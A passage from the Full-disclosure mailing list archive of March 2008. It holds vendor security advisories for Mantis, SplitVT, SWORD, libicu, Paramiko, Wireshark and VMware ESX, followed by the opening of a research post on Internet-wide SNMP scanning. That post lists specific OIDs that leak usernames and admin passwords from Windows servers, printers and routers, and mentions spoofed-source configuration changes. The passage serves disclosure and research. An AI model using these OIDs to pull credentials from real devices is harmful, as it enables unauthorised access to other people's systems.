constitutes acceptance for use on an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. From py at gentoo.org Mon Mar 3 21:42:05 2008 From: py at gentoo.org (Pierre-Yves Rofes) Date: Mon, 03 Mar 2008 22:42:05 +0100 Subject: [Full-disclosure] [ GLSA 200803-04 ] Mantis: Cross-Site Scripting Message-ID: <47CC70AD.1050405@gentoo.org> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200803-04 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Low Title: Mantis: Cross-Site Scripting Date: March 03, 2008 Bugs: #203791 ID: 200803-04 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== A persistent Cross-Site Scripting vulnerability has been discovered in Mantis. Background ========== Mantis is a web-based bug tracking system. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 www-apps/mantisbt < 1.0.8-r1 >= 1.0.8-r1 Description =========== seiji reported that the filename for the uploaded file in bug_report.php is not properly sanitised before being stored. Impact ====== A remote attacker could upload a file with a specially crafted to a bug report, resulting in the execution of arbitrary HTML and script code within the context of the users's browser. Note that this vulnerability is only exploitable by authenticated users. Workaround ========== There is no known workaround at this time. Resolution ========== All Mantis users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=www-apps/mantisbt-1.0.8-r1" References ========== [ 1 ] CVE-2007-6611 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6611 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200803-04.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to security at gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org. License ======= Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 -----BEGIN PGP SIGNATURE----- Version: GnuPG v2.0.7 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFHzHCtuhJ+ozIKI5gRAnPeAJ4jT1zqcc/xxiGeF3pfMzi/yZznvgCgolXY mo0mgPPgKLcwm2vE4h7kOKY= =6gN6 -----END PGP SIGNATURE----- From py at gentoo.org Mon Mar 3 21:48:59 2008 From: py at gentoo.org (Pierre-Yves Rofes) Date: Mon, 03 Mar 2008 22:48:59 +0100 Subject: [Full-disclosure] [ GLSA 200803-05 ] SplitVT: Privilege escalation Message-ID: <47CC724B.9070307@gentoo.org> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200803-05 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High Title: SplitVT: Privilege escalation Date: March 03, 2008 Bugs: #211240 ID: 200803-05 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== A vulnerability in SplitVT may allow local users to gain escalated privileges. Background ========== SplitVT is a program for splitting terminals into two shells. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 app-misc/splitvt < 1.6.6-r1 >= 1.6.6-r1 Description =========== Mike Ashton reported that SplitVT does not drop group privileges before executing the xprop utility. Impact ====== A local attacker could exploit this vulnerability to gain the "utmp" group privileges. Workaround ========== There is no known workaround at this time. Resolution ========== All SplitVT users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=app-misc/splitvt-1.6.6-r1" References ========== [ 1 ] CVE-2008-0162 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0162 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200803-05.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to security at gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org. License ======= Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 -----BEGIN PGP SIGNATURE----- Version: GnuPG v2.0.7 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFHzHJLuhJ+ozIKI5gRApfjAJ0SqPZ79ALH6HMJfGAzt65BH+9OFwCfVWco bS6neubcIpIPKnzy7sOnjE0= =KoEB -----END PGP SIGNATURE----- From py at gentoo.org Mon Mar 3 22:00:10 2008 From: py at gentoo.org (Pierre-Yves Rofes) Date: Mon, 03 Mar 2008 23:00:10 +0100 Subject: [Full-disclosure] [ GLSA 200803-06 ] SWORD: Shell command injection Message-ID: <47CC74EA.40401@gentoo.org> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200803-06 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High Title: SWORD: Shell command injection Date: March 03, 2008 Bugs: #210754 ID: 200803-06 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== Insufficient input checking in SWORD may allow shell command injection. Background ========== SWORD is a library for Bible study software. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 app-text/sword < 1.5.8-r2 >= 1.5.8-r2 Description =========== Dan Dennison reported that the diatheke.pl script used in SWORD does not properly sanitize shell meta-characters in the "range" parameter before processing it. Impact ====== A remote attacker could provide specially crafted input to a vulnerable application, possibly resulting in the remote execution of arbitrary shell commands with the privileges of the user running SWORD (generally the web server account). Workaround ========== There is no known workaround at this time. Resolution ========== All SWORD users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=app-text/sword-1.5.8-r2" References ========== [ 1 ] CVE-2008-0932 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0932 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200803-06.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to security at gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org. License ======= Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 -----BEGIN PGP SIGNATURE----- Version: GnuPG v2.0.7 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFHzHTpuhJ+ozIKI5gRAmOTAJ93/DdAiuRV8JbRq/phHYIzTomn4wCfYaJT cEFjYtpok7uJPUNj8t52thY= =h+WR -----END PGP SIGNATURE----- From skx at debian.org Mon Mar 3 21:14:41 2008 From: skx at debian.org (Steve Kemp) Date: Mon, 3 Mar 2008 21:14:41 +0000 Subject: [Full-disclosure] [SECURITY] [DSA 1511-1] New libicu packages fix multiple problems Message-ID: <20080303211441.GA5912@steve.org.uk> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------ Debian Security Advisory DSA-1511-1 security at debian.org http://www.debian.org/security/ Steve Kemp March 03, 2008 http://www.debian.org/security/faq - ------------------------------------------------------------------------ Package : libicu Vulnerability : various Problem type : local Debian-specific: no CVE Id(s) : 2007-4770 2007-4771 Debian Bug : 463688 Several local vulnerabilities have been discovered in libicu, International Components for Unicode, The Common Vulnerabilities and Exposures project identifies the following problems: CVE-2007-4770 libicu in International Components for Unicode (ICU) 3.8.1 and earlier attempts to process backreferences to the nonexistent capture group zero (aka \0), which might allow context-dependent attackers to read from, or write to, out-of-bounds memory locations, related to corruption of REStackFrames. CVE-2007-4771 Heap-based buffer overflow in the doInterval function in regexcmp.cpp in libicu in International Components for Unicode (ICU) 3.8.1 and earlier allows context-dependent attackers to cause a denial of service (memory consumption) and possibly have unspecified other impact via a regular expression that writes a large amount of data to the backtracking stack. For the stable distribution (etch), these problems have been fixed in version 3.6-2etch1. For the unstable distribution (sid), these problems have been fixed in version 3.8-6. We recommend that you upgrade your libicu package. Upgrade instructions - -------------------- wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 4.0 alias etch - ------------------------------- Source archives: http://security.debian.org/pool/updates/main/i/icu/icu_3.6.orig.tar.gz Size/MD5 checksum: 9778863 0f1bda1992b4adca62da68a7ad79d830 http://security.debian.org/pool/updates/main/i/icu/icu_3.6-2etch1.dsc Size/MD5 checksum: 591 13dcea6b1c9a282147b99c4867db6ee8 http://security.debian.org/pool/updates/main/i/icu/icu_3.6-2etch1.diff.gz Size/MD5 checksum: 9552 82e560098b24b245872b163a522a80b8 Architecture independent packages: http://security.debian.org/pool/updates/main/i/icu/icu-doc_3.6-2etch1_all.deb Size/MD5 checksum: 3332194 5da76263265814905245b97daec4c1c3 alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/i/icu/libicu36-dev_3.6-2etch1_alpha.deb Size/MD5 checksum: 7028746 b6b13d0fa262501923c97a859b400d10 http://security.debian.org/pool/updates/main/i/icu/libicu36_3.6-2etch1_alpha.deb Size/MD5 checksum: 5581984 0cd37ce9f234b9207accc424dc191f49 amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/i/icu/libicu36-dev_3.6-2etch1_amd64.deb Size/MD5 checksum: 6585582 9fe0ee74625a985628c9af096dd13827 http://security.debian.org/pool/updates/main/i/icu/libicu36_3.6-2etch1_amd64.deb Size/MD5 checksum: 5444228 250851db4a613e9a5d0029d73c1196c0 arm architecture (ARM) http://security.debian.org/pool/updates/main/i/icu/libicu36-dev_3.6-2etch1_arm.deb Size/MD5 checksum: 6631114 a73ff442415ca3bc336f1fb49e3aa701 http://security.debian.org/pool/updates/main/i/icu/libicu36_3.6-2etch1_arm.deb Size/MD5 checksum: 5458358 c6d533fd7c1c51efbac58d2a96a386fb hppa architecture (HP PA RISC) http://security.debian.org/pool/updates/main/i/icu/libicu36-dev_3.6-2etch1_hppa.deb Size/MD5 checksum: 7090294 aadca0bc8fb9307ea7fe293406a10e5f http://security.debian.org/pool/updates/main/i/icu/libicu36_3.6-2etch1_hppa.deb Size/MD5 checksum: 5909956 07bd8e6c733072fca8b96cc10e210a68 i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/i/icu/libicu36_3.6-2etch1_i386.deb Size/MD5 checksum: 5468656 532aa02d6d67d4b6527ac8c29c9d110e http://security.debian.org/pool/updates/main/i/icu/libicu36-dev_3.6-2etch1_i386.deb Size/MD5 checksum: 6465540 bfd4d908b552bba2d871771f86369ec7 ia64 architecture (Intel ia64) http://security.debian.org/pool/updates/main/i/icu/libicu36-dev_3.6-2etch1_ia64.deb Size/MD5 checksum: 7238880 10b410fcd460e47c3619de88167b74f5 http://security.debian.org/pool/updates/main/i/icu/libicu36_3.6-2etch1_ia64.deb Size/MD5 checksum: 5865536 dbc0ec913f08682cec4f1b75d35e0531 mips architecture (MIPS (Big Endian)) http://security.debian.org/pool/updates/main/i/icu/libicu36-dev_3.6-2etch1_mips.deb Size/MD5 checksum: 7047506 c0b327e8229d1d4d33131453cdac6508 http://security.debian.org/pool/updates/main/i/icu/libicu36_3.6-2etch1_mips.deb Size/MD5 checksum: 5748172 126a2f0bb4b61cc54d70edb882191576 powerpc architecture (PowerPC) http://security.debian.org/pool/updates/main/i/icu/libicu36_3.6-2etch1_powerpc.deb Size/MD5 checksum: 5747754 8bc631ad394a86e11c24c5b9ffd76f1d http://security.debian.org/pool/updates/main/i/icu/libicu36-dev_3.6-2etch1_powerpc.deb Size/MD5 checksum: 6888906 c5542d6d957327fd6f540029f4195772 s390 architecture (IBM S/390) http://security.debian.org/pool/updates/main/i/icu/libicu36_3.6-2etch1_s390.deb Size/MD5 checksum: 5776762 16a114247a39201f3966ff4f22b80342 http://security.debian.org/pool/updates/main/i/icu/libicu36-dev_3.6-2etch1_s390.deb Size/MD5 checksum: 6895102 15624240d20d2e0aa7a29bbc90895908 sparc architecture (Sun SPARC/UltraSPARC) http://security.debian.org/pool/updates/main/i/icu/libicu36_3.6-2etch1_sparc.deb Size/MD5 checksum: 5671256 2c7a50b1fe50dbe4b3ef8995d91e5946 http://security.debian.org/pool/updates/main/i/icu/libicu36-dev_3.6-2etch1_sparc.deb Size/MD5 checksum: 6771832 84a95a10934106c8cfc409032191de98 These files will probably be moved into the stable distribution on its next update. - --------------------------------------------------------------------------------- For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce at lists.debian.org Package info: `apt-cache show ' and http://packages.debian.org/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) iD8DBQFHzGoFwM/Gs81MDZ0RApgrAJ9Jd4cpLRAJ7WTQAnnpd8d4K3/mvwCeNusV OLKQ6zeO2ePgNnldMI08TRU= =ay/5 -----END PGP SIGNATURE----- From py at gentoo.org Mon Mar 3 22:11:00 2008 From: py at gentoo.org (Pierre-Yves Rofes) Date: Mon, 03 Mar 2008 23:11:00 +0100 Subject: [Full-disclosure] [ GLSA 200803-07 ] Paramiko: Information disclosure Message-ID: <47CC7774.9090008@gentoo.org> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200803-07 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Low Title: Paramiko: Information disclosure Date: March 03, 2008 Bugs: #205777 ID: 200803-07 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== Unsafe randomness usage in Paramiko may allow access to sensitive information. Background ========== Paramiko is a Secure Shell Server implementation written in Python. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 dev-python/paramiko < 1.7.2 >= 1.7.2 Description =========== Dwayne C. Litzenberger reported that the file "common.py" does not properly use RandomPool when using threads or forked processes. Impact ====== A remote attacker could predict the values generated by applications using Paramiko for encryption purposes, potentially gaining access to sensitive information. Workaround ========== There is no known workaround at this time. Resolution ========== All Paramiko users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=dev-python/paramiko-1.7.2" References ========== [ 1 ] CVE-2008-0299 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0299 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200803-07.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to security at gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org. License ======= Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 -----BEGIN PGP SIGNATURE----- Version: GnuPG v2.0.7 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFHzHd0uhJ+ozIKI5gRAg0QAJ43W26KJoUkLj/zCCTJk8hcMNCWWACdG2Bm IO5CIH1vE/Ts0MrtKNEcbMI= =YoSJ -----END PGP SIGNATURE----- From security at mandriva.com Mon Mar 3 21:57:37 2008 From: security at mandriva.com (security at mandriva.com) Date: Mon, 03 Mar 2008 14:57:37 -0700 Subject: [Full-disclosure] [ MDVSA-2008:057 ] - Updated wireshark packages fix denial of service vulnerabilities Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVSA-2008:057 http://www.mandriva.com/security/ _______________________________________________________________________ Package : wireshark Date : March 3, 2008 Affected: 2007.0, 2007.1, 2008.0, Corporate 4.0 _______________________________________________________________________ Problem Description: A few vulnerabilities were found in Wireshark, that could cause it to crash or consume excessive memory under certain conditions. This update rovides Wireshark 0.99.8 which is not vulnerable to the issues. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1070 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1071 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1072 http://www.wireshark.org/security/wnpa-sec-2008-01.html _______________________________________________________________________ Updated Packages: Mandriva Linux 2007.0: 267c56b10fb4a47dc6c6bc5be7560dae 2007.0/i586/libwireshark0-0.99.8-0.1mdv2007.0.i586.rpm bb9e087841735100bd1b7e781406f2a9 2007.0/i586/tshark-0.99.8-0.1mdv2007.0.i586.rpm accb363010f2fe2968fb2ffef055baa1 2007.0/i586/wireshark-0.99.8-0.1mdv2007.0.i586.rpm a7b6f91a9503d386719fada340aa9609 2007.0/i586/wireshark-tools-0.99.8-0.1mdv2007.0.i586.rpm db4d926599022fb1bda29f01361741b7 2007.0/SRPMS/wireshark-0.99.8-0.1mdv2007.0.src.rpm Mandriva Linux 2007.0/X86_64: 554b16372d0b6efa6e58540b242eb161 2007.0/x86_64/lib64wireshark0-0.99.8-0.1mdv2007.0.x86_64.rpm 5e806e0df70813e1e0d01890f6730941 2007.0/x86_64/tshark-0.99.8-0.1mdv2007.0.x86_64.rpm 6b510b94cb16328f3057ff3496eed119 2007.0/x86_64/wireshark-0.99.8-0.1mdv2007.0.x86_64.rpm 6669f32ee39af1372421580577548792 2007.0/x86_64/wireshark-tools-0.99.8-0.1mdv2007.0.x86_64.rpm db4d926599022fb1bda29f01361741b7 2007.0/SRPMS/wireshark-0.99.8-0.1mdv2007.0.src.rpm Mandriva Linux 2007.1: ba21439b01df6e246eedc8cce6a5bfab 2007.1/i586/libwireshark0-0.99.8-0.1mdv2007.1.i586.rpm 2bfa375e12face3cf9bae7cfd6254eb7 2007.1/i586/tshark-0.99.8-0.1mdv2007.1.i586.rpm 1799a7f54cdb16c7083d893b96ea4f07 2007.1/i586/wireshark-0.99.8-0.1mdv2007.1.i586.rpm 7cf16c987c99870be72752daa98cd3fd 2007.1/i586/wireshark-tools-0.99.8-0.1mdv2007.1.i586.rpm 7daa2b09a504c7246bf3e9bcaebc6354 2007.1/SRPMS/wireshark-0.99.8-0.1mdv2007.1.src.rpm Mandriva Linux 2007.1/X86_64: 8f67f28d3973c7be6255ef0ac542701e 2007.1/x86_64/lib64wireshark0-0.99.8-0.1mdv2007.1.x86_64.rpm 34246a2870ef18ed40599a498ab3ab4c 2007.1/x86_64/tshark-0.99.8-0.1mdv2007.1.x86_64.rpm aeb22fb0fb1fd2224e88e432c450a497 2007.1/x86_64/wireshark-0.99.8-0.1mdv2007.1.x86_64.rpm 9c3f863f13de7c7836d2a9e32bf2b99b 2007.1/x86_64/wireshark-tools-0.99.8-0.1mdv2007.1.x86_64.rpm 7daa2b09a504c7246bf3e9bcaebc6354 2007.1/SRPMS/wireshark-0.99.8-0.1mdv2007.1.src.rpm Mandriva Linux 2008.0: 071c56558b673bb348842bbd1f15b70d 2008.0/i586/libwireshark-devel-0.99.8-0.1mdv2008.0.i586.rpm f62eb9005ca79b7d359a1d638f071e48 2008.0/i586/libwireshark0-0.99.8-0.1mdv2008.0.i586.rpm 2163377dcd39c6d78aba1afa0f19f6eb 2008.0/i586/tshark-0.99.8-0.1mdv2008.0.i586.rpm d2ccb07c5aa016b497a1305514749b6a 2008.0/i586/wireshark-0.99.8-0.1mdv2008.0.i586.rpm ad50c14fcf45996717240f2867a7dc35 2008.0/i586/wireshark-tools-0.99.8-0.1mdv2008.0.i586.rpm 10d849d01ef57ff886fc851007f6e0d1 2008.0/SRPMS/wireshark-0.99.8-0.1mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: 31360d9b2ff81d63eb0009a65d5313d7 2008.0/x86_64/lib64wireshark-devel-0.99.8-0.1mdv2008.0.x86_64.rpm 93a40a47cfc3f1a8cb6d584a8c189ac7 2008.0/x86_64/lib64wireshark0-0.99.8-0.1mdv2008.0.x86_64.rpm 9975a6a15d32ea7424cf46769186e65c 2008.0/x86_64/tshark-0.99.8-0.1mdv2008.0.x86_64.rpm 01b0691e1a80a3df48da2b982de0a814 2008.0/x86_64/wireshark-0.99.8-0.1mdv2008.0.x86_64.rpm d046aafde7235aaeaca359fe3efcead5 2008.0/x86_64/wireshark-tools-0.99.8-0.1mdv2008.0.x86_64.rpm 10d849d01ef57ff886fc851007f6e0d1 2008.0/SRPMS/wireshark-0.99.8-0.1mdv2008.0.src.rpm Corporate 4.0: c25ee38aeaf063b1819226153a619468 corporate/4.0/i586/libwireshark0-0.99.8-0.1.20060mlcs4.i586.rpm 34e49cd2419c98ed08160ea20e0d747e corporate/4.0/i586/tshark-0.99.8-0.1.20060mlcs4.i586.rpm e05ea8642e89a82b93d9f187cf2dea39 corporate/4.0/i586/wireshark-0.99.8-0.1.20060mlcs4.i586.rpm 07828feed3b1e0aafdfff6f47d05136e corporate/4.0/i586/wireshark-tools-0.99.8-0.1.20060mlcs4.i586.rpm 1db4637ddab6b4787607a9168a24d825 corporate/4.0/SRPMS/wireshark-0.99.8-0.1.20060mlcs4.src.rpm Corporate 4.0/X86_64: 226ccff30ff4753c59dd657a18250ad4 corporate/4.0/x86_64/lib64wireshark0-0.99.8-0.1.20060mlcs4.x86_64.rpm 1b75137b7fd262a7502323d9ec5f7130 corporate/4.0/x86_64/tshark-0.99.8-0.1.20060mlcs4.x86_64.rpm d7b77256eb8567ce37fb0021ae61a264 corporate/4.0/x86_64/wireshark-0.99.8-0.1.20060mlcs4.x86_64.rpm c20e4c81db130d2025a1f3903ec8ac47 corporate/4.0/x86_64/wireshark-tools-0.99.8-0.1.20060mlcs4.x86_64.rpm 1db4637ddab6b4787607a9168a24d825 corporate/4.0/SRPMS/wireshark-0.99.8-0.1.20060mlcs4.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.8 (GNU/Linux) iD8DBQFHzEjrmqjQ0CJFipgRAvKzAKDq0ngyIBmNw/N9CMWTErMPKHkZHgCgrxf8 2qQSOFnaqHWoU3xidm0MKcE= =+zG8 -----END PGP SIGNATURE----- From security at vmware.com Mon Mar 3 22:10:58 2008 From: security at vmware.com (VMware Security team) Date: Mon, 03 Mar 2008 14:10:58 -0800 Subject: [Full-disclosure] VMSA-2008-0004 Low: Updated e2fsprogs service console package Message-ID: <47CC7772.8030509@vmware.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 - ------------------------------------------------------------------- ~ VMware Security Advisory Advisory ID: VMSA-2008-0004 Synopsis: Low: Updated e2fsprogs service console package Issue date: 2008-03-03 Updated on: 2008-03-03 (initial release of advisory) CVE numbers: CVE-2007-5497 - ------------------------------------------------------------------- 1. Summary: Updated service console package e2fsprogs. 2. Relevant releases: ESX Server 2.5.5 Upgrade Patch 5 ESX Server 2.5.4 Upgrade Patch 16 NOTE: ESX 2.5.4 is in Extended Support and its end of support (Security ~ and Bug fixes) is 10/08/2008. Users should plan to upgrade to at ~ least 2.5.5 and preferably the newest release available before ~ the end of extended support. ~ ESX Server prior to 2.5.4 are no longer in Extended Support. ~ Users should upgrade to a supported version of the product. ~ The VMware Infrastructure Support Life Cycle Policy can be found ~ here: http://www.vmware.com/support/policies/eos_vi.html 3. Problem description: Updated e2fsprogs package address multiple integer overflow flaws Thanks to Rafal Wojtczuk of McAfee Avert Research for identifying and reporting this issue. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2007-5497 to this issue. 4. Solution: Please review the Patch notes for your product and version and verify the md5sum of your downloaded file. ESX Server 2.x Patches: http://www.vmware.com/download/esx/esx2_patches.html ESX Server 2.5.5 Upgrade Patch 5 http://download3.vmware.com/software/esx/esx-2.5.5-73417-upgrade.tar.gz md5sum: cf0addac42cb2057c47065971f56bee6 http://www.vmware.com/support/esx25/doc/esx-255-200802-patch.html ESX Server 2.5.4 Upgrade Patch 16 http://download3.vmware.com/software/esx/esx-2.5.4-73416-upgrade.tar.gz md5sum: b7b2cbfd45380124c128831dca8bc2b0 http://www.vmware.com/support/esx25/doc/esx-254-200802-patch.html 5. References: ~ CVE numbers ~ http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5497 - ------------------------------------------------------------------- 6. Contact: E-mail list for product security notifications and announcements: http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce This Security Advisory is posted to the following lists: ~ * security-announce at lists.vmware.com ~ * bugtraq at securityfocus.com ~ * full-disclosure at lists.grok.org.uk E-mail: security at vmware.com Security web site http://www.vmware.com/security VMware security response policy http://www.vmware.com/support/policies/security_response.html General support life cycle policy http://www.vmware.com/support/policies/eos.html VMware Infrastructure support life cycle policy http://www.vmware.com/support/policies/eos_vi.html Copyright 2008 VMware Inc. All rights reserved. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.7 (GNU/Linux) iD8DBQFHzHdoS2KysvBH1xkRCCxrAJsHDTczV7agRyav5nMXgVmvMKTsSACfTmLl Rv1wQy510KaPTQy9LiNMTNo= =yM44 -----END PGP SIGNATURE----- From unknown.pentester at gmail.com Tue Mar 4 00:02:25 2008 From: unknown.pentester at gmail.com (Adrian P) Date: Tue, 4 Mar 2008 00:02:25 +0000 Subject: [Full-disclosure] Exploring the UNKNOWN: Scanning the Internet via SNMP! Message-ID: * Exploring the UNKNOWN: Scanning the Internet via SNMP! * http://www.gnucitizen.org/blog/exploring-the-unknown-scanning-the-internet-via-snmp/ Hacking is not only about coming up with interesting solutions to problems, but also about exploring the unknown. It was this drive for knowledge philosophy that lead to surveying a significant sample of the Internet which allowed us to make some VERY interesting observations and get an idea of the current state of _remote SNMP hacking_. * Why SNMP? * 2.5 million random IP addresses were surveyed via SNMP. Why SNMP you might be asking? Well, there are several reasons. First of all SNMP is a UDP-based protocol which allows us to perform scanning at a much shorter time than via TCP-based protocols. Another advantage of UDP-based protocols is that the source IP address can be spoofed easily. In the case of SNMP, it means that an attacker could change configuration settings from a spoofed IP address provided that a valid write community string is identified or cracked. Needless to say, changing config settings via SNMP can lead to a full compromise. Finally, we have been very involved [1] researching embedded devices lately, and since a significant amount of Internet devices are hackable via SNMP, such protocol was an obvious candidate. * When SNMP read access is all we need for successful pwnage * Gaining SNMP write access is of course usually considered to be a more serious issue than gaining SNMP read access only. However, even if a cracker only gained read access to a device/server via a SNMP community string, sometimes it would possible to extract sensitive information such as usernames and passwords which would eventually lead to a compromise of the targeted systems. In order to accomplish this, all that is needed by the attacker is knowledge of an interesting OID to query. My point is that SNMP read access could a enough to fully own a device! * Examples of juicy leaks via SNMP read access * For instance, Windows servers return the full list of usernames [2] by snmwalking the OID 1.3.6.1.4.1.77.1.2.25. Or how about the BT Voyager 2000 router leaking the ISP credentials [3] including the password? Oh, wait, I almost forgot to mention HP JetDirect printers leaking [4] the admin password [5] via SNMP read access (using OIDs .iso.3.6.1.4.1.11.2.3.9.4.2.1.3.9.1.1.0 and .1.3.6.1.4.1.11.2.3.9.1.1.13.0). And of course the recently disclosed [6] Dynamic DNS credentials disclosure on ZyXEL Prestige routers via the OID 1.3.6.1.4.1.890.1.2.1.2.6.0 (see section 2.2 in the paper for more details). You get the point: lots of devices leak _way too much information_ via SNMP read access. * The juicy survey stats! * >From a total number of 2.5 million random IP addresses, 5320 IP addresses responded to the submitted SNMP requests. Although this is only %0.2128 of all the IP addresses, we need to keep in mind that most Internet systems with SNMP support correspond to embedded devices, which only make a small portion of the Internet. One query was sent to each random IP using the community string "public", which is often used as the default read community string. The OID queried on each request is 1.3.6.1.2.1.1.1.0 which is the system description (usually returns brand and model). The destination port used was 161/UDP. Although some systems used different default port numbers for SNMP daemons, 161 is definitely the most common one. In order to protect the innocent, we hid the first two octets of the IP addresses included in our results CSV file: cat ./2dot5million-random-ips.csv | while read line do echo -en '*.*.'>>./2dot5million-random-ips.hidden.csv; echo $line | cut -d "." -f 3- >> ./2dot5million-random-ips.hidden.csv done The most common systems found were the following: * ARRIS Touchstone Telephony Modems [7] - these VoIP modems alone made more than 35% of all found devices discovered! * Cisco routers * Apple AirPort [8] and Base Station * ZyXEL Prestige routers * Netopia routers * Windows 2000 servers Obviously, what kind of SNMP-enabled devices are the most popular on the Internet is very interesting information from a research point of view. For instance, if researching remote SNMP 